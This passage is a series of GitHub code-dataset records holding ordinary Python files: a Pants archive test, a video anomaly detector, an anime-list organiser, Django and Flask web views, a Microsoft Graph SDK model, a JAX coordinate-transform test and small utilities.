*package_pex_binary.rules(),\n *python_target_type_rules.rules(),\n QueryRule(BuiltPackage, [ArchiveFieldSet]),\n ],\n 
target_types=[ArchiveTarget, FilesGeneratorTarget, RelocatedFiles, PexBinary],\n )\n rule_runner.set_options([], env_inherit={\"PATH\", \"PYENV_ROOT\", \"HOME\"})\n\n rule_runner.write_files(\n {\n \"resources/d1.json\": \"{'k': 1}\",\n \"resources/d2.json\": \"{'k': 2}\",\n \"resources/BUILD\": dedent(\n \"\"\"\\\n files(name='original_files', sources=['*.json'])\n\n relocated_files(\n name='relocated_files',\n files_targets=[':original_files'],\n src=\"resources\",\n dest=\"data\",\n )\n \"\"\"\n ),\n \"project/app.py\": \"print('hello world!')\",\n \"project/BUILD\": \"pex_binary(entry_point='app.py')\",\n \"BUILD\": dedent(\n \"\"\"\\\n archive(\n name=\"archive1\",\n packages=[\"project\"],\n files=[\"resources:original_files\"],\n format=\"zip\",\n )\n\n archive(\n name=\"archive2\",\n packages=[\":archive1\"],\n files=[\"resources:relocated_files\"],\n format=\"tar\",\n output_path=\"output/archive2.tar\",\n )\n \"\"\"\n ),\n }\n )\n\n def get_archive(target_name: str) -> FileContent:\n tgt = rule_runner.get_target(Address(\"\", target_name=target_name))\n built_package = rule_runner.request(BuiltPackage, [ArchiveFieldSet.create(tgt)])\n digest_contents = rule_runner.request(DigestContents, [built_package.digest])\n assert len(digest_contents) == 1\n return digest_contents[0]\n\n def assert_archive1_is_valid(zip_bytes: bytes) -> None:\n io = BytesIO()\n io.write(zip_bytes)\n with zipfile.ZipFile(io) as zf:\n assert set(zf.namelist()) == {\n \"resources/d1.json\",\n \"resources/d2.json\",\n \"project/project.pex\",\n }\n with zf.open(\"resources/d1.json\", \"r\") as f:\n assert f.read() == b\"{'k': 1}\"\n with zf.open(\"resources/d2.json\", \"r\") as f:\n assert f.read() == b\"{'k': 2}\"\n\n archive1 = get_archive(\"archive1\")\n assert_archive1_is_valid(archive1.content)\n\n archive2 = get_archive(\"archive2\")\n assert archive2.path == \"output/archive2.tar\"\n io = BytesIO()\n io.write(archive2.content)\n io.seek(0)\n with tarfile.open(fileobj=io, mode=\"r:\") as tf:\n assert set(tf.getnames()) == {\"data/d1.json\", \"data/d2.json\", \"archive1.zip\"}\n\n def get_file(fp: str) -> bytes:\n reader = tf.extractfile(fp)\n assert reader is not None\n return reader.read()\n\n assert get_file(\"data/d1.json\") == b\"{'k': 1}\"\n assert get_file(\"data/d2.json\") == b\"{'k': 2}\"\n assert_archive1_is_valid(get_file(\"archive1.zip\"))\n\n\ndef test_generate_file_and_resource_targets() -> None:\n rule_runner = RuleRunner(\n rules=[\n core_target_types.generate_targets_from_files,\n core_target_types.generate_targets_from_resources,\n QueryRule(GeneratedTargets, [GenerateTargetsFromFiles]),\n QueryRule(GeneratedTargets, [GenerateTargetsFromResources]),\n ],\n target_types=[FilesGeneratorTarget, ResourcesGeneratorTarget],\n )\n rule_runner.write_files(\n {\n \"assets/BUILD\": dedent(\n \"\"\"\\\n files(\n name='files',\n sources=['**/*.ext'],\n overrides={'f1.ext': {'tags': ['overridden']}},\n )\n\n resources(\n name='resources',\n sources=['**/*.ext'],\n overrides={'f1.ext': {'tags': ['overridden']}},\n )\n \"\"\"\n ),\n \"assets/f1.ext\": \"\",\n \"assets/f2.ext\": \"\",\n \"assets/subdir/f.ext\": \"\",\n }\n )\n\n files_generator = rule_runner.get_target(Address(\"assets\", target_name=\"files\"))\n resources_generator = rule_runner.get_target(Address(\"assets\", target_name=\"resources\"))\n\n def gen_file_tgt(rel_fp: str, tags: list[str] | None = None) -> FileTarget:\n return FileTarget(\n {SingleSourceField.alias: rel_fp, Tags.alias: tags},\n Address(\"assets\", target_name=\"files\", 
relative_file_path=rel_fp),\n residence_dir=os.path.dirname(os.path.join(\"assets\", rel_fp)),\n )\n\n def gen_resource_tgt(rel_fp: str, tags: list[str] | None = None) -> ResourceTarget:\n return ResourceTarget(\n {SingleSourceField.alias: rel_fp, Tags.alias: tags},\n Address(\"assets\", target_name=\"resources\", relative_file_path=rel_fp),\n residence_dir=os.path.dirname(os.path.join(\"assets\", rel_fp)),\n )\n\n generated_files = rule_runner.request(\n GeneratedTargets, [GenerateTargetsFromFiles(files_generator)]\n )\n generated_resources = rule_runner.request(\n GeneratedTargets, [GenerateTargetsFromResources(resources_generator)]\n )\n\n assert generated_files == GeneratedTargets(\n files_generator,\n {\n gen_file_tgt(\"f1.ext\", tags=[\"overridden\"]),\n gen_file_tgt(\"f2.ext\"),\n gen_file_tgt(\"subdir/f.ext\"),\n },\n )\n assert generated_resources == GeneratedTargets(\n resources_generator,\n {\n gen_resource_tgt(\"f1.ext\", tags=[\"overridden\"]),\n gen_resource_tgt(\"f2.ext\"),\n gen_resource_tgt(\"subdir/f.ext\"),\n },\n )\n","repo_name":"akk5597/pants","sub_path":"src/python/pants/core/target_types_test.py","file_name":"target_types_test.py","file_ext":"py","file_size_in_byte":11463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"22363124992","text":"import cv2\nimport numpy as np \nfrom keras.models import load_model\nfrom PIL import Image\nimport imutils\nimport matplotlib.pyplot as plt\n\ndef mean_squared_loss(x1,x2):\n difference=x1-x2\n a,b,c,d,e=difference.shape\n n_samples=a*b*c*d*e\n sq_difference=difference**2\n Sum=sq_difference.sum()\n distance=np.sqrt(Sum)\n mean_distance=distance/n_samples\n\n return mean_distance\ndef calculate_threshold(data, factor):\n median = np.median(data)\n mad = np.median(np.abs(data - median))\n threshold = median + factor * mad\n return threshold\n\nmodel=load_model(\"saved_model.h5\")\n\ncap = cv2.VideoCapture(\"test_video3.mp4\")\nprint(cap.isOpened())\n\nloss_values = []\n\nwhile cap.isOpened():\n\n imagedump=[]\n ret,frame=cap.read()\n\n if ret == False:\n break\n\n for i in range(10):\n ret,frame=cap.read()\n if ret == False:\n break\n\n image = imutils.resize(frame,width=1000,height=1200)\n frame=cv2.resize(frame, (227,227), interpolation = cv2.INTER_AREA)\n gray=0.2989*frame[:,:,0]+0.5870*frame[:,:,1]+0.1140*frame[:,:,2]\n gray=(gray-gray.mean())/gray.std()\n gray=np.clip(gray,0,1)\n imagedump.append(gray)\n\n imagedump=np.array(imagedump)\n imagedump.resize(227,227,10)\n imagedump=np.expand_dims(imagedump,axis=0)\n imagedump=np.expand_dims(imagedump,axis=4)\n\n output=model.predict(imagedump)\n\n loss=mean_squared_loss(imagedump,output)\n\n loss_values.append(loss)\nthreshold=calculate_threshold(loss_values, 0.7)\nwhile cap.isOpened():\n\n imagedump=[]\n ret,frame=cap.read()\n\n if ret == False:\n break\n\n for i in range(10):\n ret,frame=cap.read()\n if ret == False:\n break\n\n image = imutils.resize(frame,width=1000,height=1200)\n frame=cv2.resize(frame, (227,227), interpolation = cv2.INTER_AREA)\n gray=0.2989*frame[:,:,0]+0.5870*frame[:,:,1]+0.1140*frame[:,:,2]\n gray=(gray-gray.mean())/gray.std()\n gray=np.clip(gray,0,1)\n imagedump.append(gray)\n\n imagedump=np.array(imagedump)\n imagedump.resize(227,227,10)\n imagedump=np.expand_dims(imagedump,axis=0)\n imagedump=np.expand_dims(imagedump,axis=4)\n\n output=model.predict(imagedump)\n\n loss=mean_squared_loss(imagedump,output)\n if frame is None:\n print(\"none\")\n \n if cv2.waitKey(1) & 0xFF==ord('q'):\n break\n \n if 
loss>threshold:\n print('Abnormal Event Detected')\n print (loss)\n cv2.putText(image,\"Abnormal Event\",(220,100),cv2.FONT_HERSHEY_SIMPLEX,2,(0,0,255),4)\n\n cv2.imshow(\"video\",image)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Gowthamk306/AnomalyDetector_Using_STAE","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6911517348","text":"def isText(line):\n line = line.lower()\n if line.__contains__(\"a\") or line.__contains__(\"e\") or line.__contains__(\"i\") or line.__contains__(\n \"o\") or line.__contains__(\"u\"):\n return True\n else:\n return False\n\n\ndef listOfAnime(x):\n animeList = open(\"/Users/marcobarreirinhas/Programs/Python/AnimeList.txt\", \"r\")\n animeWList = []\n animeNFList = []\n animeNSList = []\n linksList = []\n\n ok1 = False\n ok2 = False\n ok3 = False\n ok4 = False\n\n for lines in animeList:\n\n lines = lines.strip(\"\\n\")\n\n if lines.__contains__(\"Watched\"):\n ok1 = True\n elif lines.__contains__(\"Not Finished\"):\n ok2 = True\n ok1 = False\n elif lines.__contains__(\"Not Started\"):\n ok3 = True\n ok2 = False\n elif lines.__contains__(\"Links\"):\n ok4 = True\n ok3 = False\n elif lines.__contains__(\"Animes\"):\n ok3 = False\n\n if ok1:\n if not lines.__contains__(\"Watched\"):\n if isText(lines):\n animeWList.append(lines[lines.index(\")\") + 2:])\n elif ok2:\n if not lines.__contains__(\"Not Finished\"):\n if isText(lines):\n animeNFList.append(lines[lines.index(\")\") + 2:])\n elif ok3:\n\n if not lines.__contains__(\"Not Started\"):\n if isText(lines):\n animeNSList.append(lines[lines.index(\")\") + 2:])\n elif ok4:\n if not lines.__contains__(\"Links\"):\n if not lines.__contains__(\"Links\"):\n if isText(lines):\n linksList.append(lines)\n\n if x == 1:\n animeWList.sort()\n return animeWList\n elif x == 2:\n animeNFList.sort()\n return animeNFList\n elif x == 3:\n animeNSList.sort()\n return animeNSList\n elif x == 4:\n linksList.sort()\n return linksList\n else:\n return []\n\n\ndef write(AW, NF, NS):\n animeW = AW\n animeNF = NF\n animeNS = NS\n links = listOfAnime(4)\n\n countW = len(animeW)\n countNF = len(animeNF)\n countNS = len(animeNS)\n\n animeList2 = open(\"/Users/marcobarreirinhas/Programs/Python/AnimeList2.txt\", \"w\")\n\n count = 1\n\n animeList2.write(\"Animes\\n\\n\\n\")\n animeList2.write(\"Watched/In progress(\" + str(countW) + \"):\\n\")\n for n in animeW:\n animeList2.write(\"\\n\")\n animeList2.write(str(count) + \") \" + n)\n count += 1\n\n count = 1\n animeList2.write(\"\\n\\n\\n\")\n animeList2.write(\"Not Finished(\" + str(countNF) + \"):\\n\")\n for n in animeNF:\n animeList2.write(\"\\n\")\n animeList2.write(str(count) + \") \" + n)\n count += 1\n count = 1\n animeList2.write(\"\\n\\n\\n\")\n animeList2.write(\"Not Started(\" + str(countNS) + \"):\\n\")\n for n in animeNS:\n animeList2.write(\"\\n\")\n animeList2.write(str(count) + \") \" + n)\n count += 1\n\n animeList2.write(\"\\n\\n\\nAnimes watched: \" + str(countW))\n animeList2.write(\"\\nAnimes not finished: \" + str(countNF))\n animeList2.write(\"\\nAnimes not started: \" + str(countNS))\n animeList2.write(\"\\nTotal number of Animes: \" + str(countW + countNF + countNS))\n\n animeList2.write(\"\\n\\n\")\n animeList2.write(\"Links:\")\n for n in links:\n animeList2.write(\"\\n\")\n 
animeList2.write(n)\n","repo_name":"CedoispirDB/commands.py","sub_path":"OrganizeAnimeList1.0/alphabetiz.py","file_name":"alphabetiz.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15263345955","text":"from django.db.models.functions import Coalesce, Lower\n\nfrom products.models import Product\n\n\nclass Manager:\n __query = None\n __products = None\n __products_output = []\n\n def __call__(self, query):\n self.__initialize(query)\n self.__obtain_products()\n self.__format_product_output()\n\n return self.__products_output\n\n def __initialize(self, query):\n self.__query = query\n\n def __obtain_products(self):\n self.__products = Product.objects.order_by('rate').all().reverse()\n\n def __format_product_output(self):\n self.__products_output.clear()\n for product in self.__products:\n icon, image = self.__obtain_medias_url(product)\n formatted_product = {\n 'id': product.id,\n 'title': product.title,\n 'url': product.url,\n 'summary': product.summary(),\n 'icon': icon,\n 'image': image,\n 'rate': product.rate,\n 'hunter': product.user.username,\n 'published': product.published_pretty(),\n }\n self.__products_output.append(formatted_product)\n\n def __obtain_medias_url(self, product):\n try:\n icon = ''\n if product.icon is not None:\n icon = product.icon.url\n image = ''\n if product.image is not None:\n image = product.image.url\n except ValueError:\n icon = ''\n image = ''\n\n return icon, image\n\n\nclass Query:\n __user_id = None\n\n def __init__(self, user_id=None):\n self.__user_id = user_id\n\n def get_user_id(self):\n return self.__user_id\n","repo_name":"carpancan/producthunt","sub_path":"products/src/query/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17775658011","text":"import os\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom transformers import pipeline, AutoTokenizer\n\nfrom Pagina import clasificador\n\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=['GET', 'POST'])\n@app.route(\"/index.html\", methods=['GET', 'POST'])\ndef escribirTexto():\n \"\"\"\n Función para escribir texto en la web.\n Devuelve:\n - El render de la vista index.html\n \"\"\"\n os.chdir(\"ModelosDefinitivos\")\n listaModelos = os.listdir()\n os.chdir('..')\n\n datos = { # Unidad de transporte de intercambio de datos entre el controlador y la vista.\n 'titulo': 'Clasificador',\n 'etiqueta': '',\n 'score': '',\n 'modelo': listaModelos[0],\n 'error': '',\n 'listaModelos': listaModelos\n }\n\n if request.method == \"POST\": # Recibimos el POST.\n print(\"POST recibido, contenido:\", request.form.get('texto'))\n texto = request.form.get('texto') # Extraemos texto.\n modelo = request.form.get('modelo') # Estraemos modelo.\n\n datos['listaModelos']=clasificador.setUltimoModeloUsado(listaModelos,modelo)\n datos['modelo'] = modelo\n print(\"modelo\",modelo)\n if texto!=\"\": # Clasificamos el texto.\n etiqueta,score=clasificador.clasificar(texto, modelo)\n datos['etiqueta']=etiqueta\n datos['score']=score\n else:\n datos['error'] = \"Debe introducir un texto\"\n return render_template('index.html', data=datos)\n\n\n@app.route(\"/subirArchivo.html\", methods=['GET', 'POST'])\ndef subirArchivo():\n \"\"\"\n Función para subir un archivo docx en la web.\n Devuelve:\n - El render de la vista subirArchivo.html\n \"\"\"\n 
os.chdir(\"ModelosDefinitivos\")\n listaModelos = os.listdir()\n os.chdir('..')\n datos = { # Unidad de transporte de intercambio de datos entre el controlador y la vista.\n 'titulo': 'Clasificador',\n 'etiqueta': '',\n 'score': '',\n 'modelo': listaModelos[0],\n 'error': '',\n 'listaModelos': listaModelos\n }\n if request.method == \"POST\": # Recibimos el POST.\n archivo = request.files['file']\n modelo = request.form.get('modelo')\n datos['listaModelos'] = clasificador.setUltimoModeloUsado(listaModelos,modelo)\n datos['modelo'] = modelo\n print(modelo)\n if archivo.filename != \"\": # Comprobamos si hay archivo subido.\n archivo.save(archivo.filename)\n import docx2txt\n import glob # Lectura y procesado de los archivos.\n formatoValido = False\n for filename in glob.glob('*.docx'):\n with open(os.path.join(os.getcwd(), filename), 'r') as f:\n texto = docx2txt.process(filename) # Extraemos el texto del documento.\n if (texto != \"\"): # Comprobamos si el archivo no está vacío.\n print(filename, \" Leído\")\n # print(texto)\n etiqueta, score = clasificador.clasificar(texto, modelo)\n datos['etiqueta'] = etiqueta\n datos['score'] = score\n print(etiqueta, score)\n print(os.getcwd())\n formatoValido = True\n os.remove(archivo.filename)\n if formatoValido == False:\n datos['error'] = \"Solo se acepta formato .docx\"\n else:\n datos['error'] = \"Debe introducir un archivo .docx\"\n\n return render_template('subirArchivo.html', data=datos)\n\n\n\ndef query_string():\n print(request)\n print(request.args)\n print(request.args.get('param'))\n return \"Ok\"\n\n\ndef error(error):\n os.chdir(\"ModelosDefinitivos\")\n listaModelos = os.listdir()\n os.chdir('..')\n envio = {\n 'titulo': 'Clasificador',\n 'modelos': '',\n 'listaModelos': listaModelos\n }\n envio['modelos'] = \"\"\n return render_template('paginaError.html', data=envio), 404\n # return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.add_url_rule('/consulta', view_func=query_string) # Enlazamos la funcion a la url forma, distinta a la anterior.\n app.register_error_handler(404, error) # Manejador del error.\n\n app.run(debug=True, port=5000)\n","repo_name":"jbmr0001/TFG-Clasificador-Autom-tico-Denuncias","sub_path":"Pagina/controladorPagina.py","file_name":"controladorPagina.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71739379628","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 27 07:18:28 2021\r\n\r\n@author: felip\r\n\"\"\"\r\n\r\nimport math\r\nfrom matplotlib import pyplot\r\n\r\ndef PuntoFijoCalcular(funcion,funcion2, referencia, tolerancia, iter):\r\n iteracionN = 1\r\n aux = 1\r\n condicion = True\r\n while condicion:\r\n x = funcion2(referencia)\r\n #print('Iteracion numero %d, el valor del punto fijo = %0.6f y la funcion en este punto = %0.6f' % (iteracionN, x, funcion(x)))\r\n referencia = x\r\n\r\n iteracionN = iteracionN + 1\r\n \r\n if iteracionN > iter:\r\n aux=0\r\n print(\"\\nSe alcanzo el maximo de iteraciones\")\r\n break\r\n \r\n condicion = abs(funcion(x)) > tolerancia\r\n \r\n if aux==1:\r\n print('\\nLa raiz para esta funcion es: %0.8f y la funcion en este punto = %0.8f' % (x, funcion(x)))\r\n print(\"Tolerancia: \",abs(funcion(x)),\" Iteraciones: \", iteracionN)\r\n else:\r\n print('El valor del punto fijo = %0.8f y la funcion en este punto = %0.8f' % (x, funcion(x)))\r\n print(\"Tolerancia: \",abs(funcion(x)),\" Iteraciones: \", iteracionN)\r\n \r\nTOL= 
10**(-10)\r\nn=10000\r\nr=-1\r\n\r\n#funcion\r\nf1 = lambda x: x**3 + 2*x + math.sqrt(4+2)\r\n\r\n#funcion de aproximación\r\ng1 = lambda x: (-(x**3)-math.sqrt(4+2))/2\r\n\r\nx = range(-2, 2)\r\npyplot.plot(x, [f1(i) for i in x])\r\npyplot.axhline(0, color=\"black\")\r\npyplot.axvline(0, color=\"black\")\r\n\r\nrespuesta = PuntoFijoCalcular(f1,g1,r,TOL,n)\r\n ","repo_name":"LuisAyala7324/Analisis-2130","sub_path":"Parciales/Parcial 1/Parcial 1.py","file_name":"Parcial 1.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35684532064","text":"from django.shortcuts import render\nfrom incidencia.models import incidencia\nfrom django.forms import model_to_dict\nfrom alumnos.models import alumnos\nfrom aula.models import aula\nfrom django.http import JsonResponse,HttpResponse\nimport json\nfrom login.models import usuario\nfrom django.contrib.auth.decorators import login_required\n#pdf\nfrom io import BytesIO\nimport xhtml2pdf.pisa as pisa\n\n@login_required\ndef index_incident(request,id):\n user=usuario.objects.get(dni=request.user)\n aulas=aula.objects.get(idAula=id,user=user)\n incidents = incidencia.objects.filter(aula=aulas,user=user).distinct()\n students = alumnos.objects.filter(aula=aulas,user=user)\n return render(request, \"incident.html\", {'incidents': incidents, 'students': students})\n\n@login_required\ndef save_incident(request):\n try:\n if (request.method == 'POST'):\n user=usuario.objects.get(dni=request.user)\n\n data = json.loads(request.body)\n classroom = data.get('classroom')\n object_classroom = aula.objects.get(idAula=classroom,user=user)\n date = data.get('date')\n description = data.get('description')\n array_students = data.get('students')\n object_incident = incidencia.objects.create(user=user,\n fecha=date, descripcion=description, aula=object_classroom)\n for n in array_students:\n object_student = alumnos.objects.get(idAlumno=n,user=user)\n object_incident.alumno.add(object_student)\n dicc = {'idIncidente': object_incident.idIncidencia,\n 'fecha': object_incident.fecha, 'descripcion': object_incident.descripcion}\n return JsonResponse(json.dumps(dicc), safe=False)\n\n except Exception as ex:\n print(ex)\n return JsonResponse({'response': 'error'})\n\n@login_required\ndef get_students(request, id):\n try:\n\n if (request.method == 'GET'):\n user=usuario.objects.get(dni=request.user)\n\n object_incident = incidencia.objects.get(idIncidencia=id,user=user)\n object_students = alumnos.objects.filter(user=user,\n incidencia=object_incident)\n dicc = []\n for n in object_students:\n object_dicc = {'apellidos': n.apellidos, 'nombres': n.nombres}\n dicc.append(object_dicc)\n return JsonResponse(json.dumps(dicc), safe=False)\n except Exception as ex:\n print(ex)\n return JsonResponse({'response': 'error'})\n\n@login_required\ndef delete_incident(request, id):\n try:\n if (request.method == 'DELETE'):\n user=usuario.objects.get(dni=request.user)\n\n incidencia.objects.get(idIncidencia=id,user=user).delete()\n return JsonResponse({'response': 'success'})\n\n except Exception as ex:\n return JsonResponse({'response': 'error'})\n\n@login_required\ndef pdf(request):\n html=request.POST.get('html','')\n archive=BytesIO()\n pdf=pisa.pisaDocument(BytesIO(html.encode(\"ISO-8859-1\")),archive)\n if not pdf.err:\n response=HttpResponse(archive.getvalue(),content_type='application/pdf')\n response['content-disposition']='attachment; filename = \"Incidencia.pdf\"'\n return 
response\n ","repo_name":"dsotoch/web-git","sub_path":"Regialu/regialu/incidencia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15795645918","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\n@dataclass\nclass DeviceDetail(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # Indicates the browser information of the used for signing in.\n browser: Optional[str] = None\n # Refers to the UniqueID of the device used for signing in.\n device_id: Optional[str] = None\n # Refers to the name of the device used for signing in.\n display_name: Optional[str] = None\n # Indicates whether the device is compliant.\n is_compliant: Optional[bool] = None\n # Indicates whether the device is managed.\n is_managed: Optional[bool] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # Indicates the operating system name and version used for signing in.\n operating_system: Optional[str] = None\n # Provides information about whether the signed-in device is Workplace Joined, AzureAD Joined, Domain Joined.\n trust_type: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> DeviceDetail:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: DeviceDetail\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return DeviceDetail()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n fields: Dict[str, Callable[[Any], None]] = {\n \"browser\": lambda n : setattr(self, 'browser', n.get_str_value()),\n \"deviceId\": lambda n : setattr(self, 'device_id', n.get_str_value()),\n \"displayName\": lambda n : setattr(self, 'display_name', n.get_str_value()),\n \"isCompliant\": lambda n : setattr(self, 'is_compliant', n.get_bool_value()),\n \"isManaged\": lambda n : setattr(self, 'is_managed', n.get_bool_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"operatingSystem\": lambda n : setattr(self, 'operating_system', n.get_str_value()),\n \"trustType\": lambda n : setattr(self, 'trust_type', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_str_value(\"browser\", self.browser)\n 
writer.write_str_value(\"deviceId\", self.device_id)\n writer.write_str_value(\"displayName\", self.display_name)\n writer.write_bool_value(\"isCompliant\", self.is_compliant)\n writer.write_bool_value(\"isManaged\", self.is_managed)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_str_value(\"operatingSystem\", self.operating_system)\n writer.write_str_value(\"trustType\", self.trust_type)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/device_detail.py","file_name":"device_detail.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"70447661546","text":"import socket\nimport tkinter as tk\n\ndef handle_response(response):\n if response == b\"1\":\n tk.messagebox.showinfo(\"Результат\", \"Да\")\n else:\n tk.messagebox.showinfo(\"Результат\", \"Нет\")\n\ndef send_request():\n HOST = '127.0.0.1'\n PORT = 12345\n\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((HOST, PORT))\n\n data = client_socket.recv(1024)\n handle_response(data)\n\nroot = tk.Tk()\nbutton = tk.Button(root, text=\"Пойдем курить?\", command=send_request)\nbutton.pack()\nroot.mainloop()\n","repo_name":"vladislavten/my_work2","sub_path":"myWork/smokeclient.py","file_name":"smokeclient.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38169890481","text":"import chex\nimport jax\nfrom jax import numpy as jnp\nimport numpy as np\nimport boltzgen as bg\nimport torch\n\nfrom eacf.targets.data import load_aldp\nfrom eacf.utils.coordinate_transform import internal\n\n\ndef test_internal_transform():\n USE_64_BIT = True\n if USE_64_BIT:\n from jax.config import config\n config.update(\"jax_enable_x64\", True)\n\n # Load aldp data\n train_set, _, _ = load_aldp(train_path='eacf/targets/data/aldp_500K_train_mini.h5')\n # Get positions\n ndim = 66\n if jax.config.jax_enable_x64:\n dtype = jnp.float64\n else:\n dtype = jnp.float32\n data_jax = jnp.array(train_set.positions.reshape(-1, ndim), dtype=dtype)\n\n # Reference transform\n data_torch = torch.tensor(np.array(data_jax).reshape(-1, ndim),\n dtype=torch.float64)\n z_matrix = [\n (0, [1, 4, 6]),\n (1, [4, 6, 8]),\n (2, [1, 4, 0]),\n (3, [1, 4, 0]),\n (4, [6, 8, 14]),\n (5, [4, 6, 8]),\n (7, [6, 8, 4]),\n (9, [8, 6, 4]),\n (10, [8, 6, 4]),\n (11, [10, 8, 6]),\n (12, [10, 8, 11]),\n (13, [10, 8, 11]),\n (15, [14, 8, 16]),\n (16, [14, 8, 6]),\n (17, [16, 14, 15]),\n (18, [16, 14, 8]),\n (19, [18, 16, 14]),\n (20, [18, 16, 19]),\n (21, [18, 16, 19])\n ]\n cart_indices = [8, 6, 14]\n ind_circ_dih = [0, 1, 2, 3, 4, 5, 8, 9, 10, 13, 15, 16]\n transform_bg = bg.flows.internal.CompleteInternalCoordinateTransform(ndim, z_matrix,\n cart_indices, data_torch,\n ind_circ_dih=ind_circ_dih)\n\n # jax transform\n transform_jax = internal.CompleteInternalCoordinateTransform(\n ndim, z_matrix, cart_indices, data_jax, ind_circ_dih=ind_circ_dih)\n\n # Check forward consistency\n batch_size = 10\n x_torch = data_torch[:batch_size]\n x_jax = data_jax[:batch_size]\n z_torch, log_det_torch = transform_bg.forward(x_torch)\n z_jax, log_det_jax = transform_jax.forward(x_jax)\n rtol = 5e-3\n chex.assert_tree_all_close(jnp.array(z_torch.numpy()), z_jax, rtol=rtol)\n chex.assert_tree_all_close(jnp.array(log_det_torch.numpy()), log_det_jax, 
rtol=rtol)\n\n # Check inverse consistency\n x_jax_, log_det_jax_ = transform_jax.inverse(z_jax)\n chex.assert_tree_all_close(log_det_jax + log_det_jax_,\n jnp.zeros_like(log_det_jax), atol=1e-4)\n x_jax__ = transform_jax.inverse(transform_jax.forward(x_jax_)[0])[0]\n chex.assert_tree_all_close(x_jax_, x_jax__, rtol=rtol)\n x_torch_, log_det_torch_ = transform_bg.inverse(torch.as_tensor(np.array(z_jax)))\n chex.assert_tree_all_close(jnp.array(x_torch_.numpy()), x_jax_, rtol=rtol, atol=3e-4)\n chex.assert_tree_all_close(jnp.array(log_det_torch_.numpy()), log_det_jax_, rtol=rtol)\n\n # Test vmap\n z_vmap, log_det_vmap = jax.vmap(transform_jax.forward)(x_jax)\n chex.assert_tree_all_close(z_vmap, z_jax, rtol=rtol)\n chex.assert_tree_all_close(log_det_vmap, log_det_jax, rtol=rtol)\n x_vmap, log_det_vmap_ = jax.vmap(transform_jax.inverse)(z_jax)\n chex.assert_tree_all_close(x_vmap, x_jax_, rtol=rtol)\n chex.assert_tree_all_close(log_det_vmap_, log_det_jax_, rtol=rtol)\n\n # Test jit\n fwd_jit = jax.jit(transform_jax.forward)\n z_jit, log_det_jit = fwd_jit(x_jax)\n chex.assert_tree_all_close(z_jit, z_jax, rtol=rtol)\n chex.assert_tree_all_close(log_det_jit, log_det_jax, rtol=rtol)\n inv_jit = jax.jit(transform_jax.inverse)\n x_jit, log_det_jit_ = inv_jit(z_jax)\n chex.assert_tree_all_close(x_jit, x_jax_, rtol=rtol)\n chex.assert_tree_all_close(log_det_jit_, log_det_jax_, rtol=rtol)\n\n\nif __name__ == '__main__':\n test_internal_transform()\n\n","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/utils/coordinate_transform/internal_test.py","file_name":"internal_test.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"830390531","text":"import logging\nimport logstash\nfrom jaeger_client import Config\nfrom statsd import StatsClient\n\nfrom uggipuggi.constants import SERVER_RUN_MODE\n\n\ndef init_statsd(prefix=None, host='statsd', port=8125):\n statsd = StatsClient(host, port, prefix=prefix)\n return statsd\n\n\ndef init_logger(log_level=logging.INFO):\n logger = logging.getLogger()\n 